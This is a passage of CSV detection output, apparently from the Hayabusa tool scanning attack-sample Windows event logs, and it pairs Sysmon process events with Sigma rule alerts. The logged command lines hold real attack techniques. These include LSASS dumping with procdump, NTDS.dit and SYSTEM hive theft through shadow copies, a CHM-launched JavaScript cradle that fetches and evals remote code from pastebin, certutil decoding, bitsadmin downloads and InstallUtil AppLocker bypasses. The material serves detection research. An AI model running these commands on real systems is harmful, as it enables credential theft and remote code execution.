security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe create shadow /for=C: : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm : Path: C:\Windows\hh.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx -2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" : Path: C:\Users\IEUser\Downloads\UACBypass.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 0000022557280720 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx -2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt : Path: C:\Windows\SysWOW64\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx -2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx -2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe 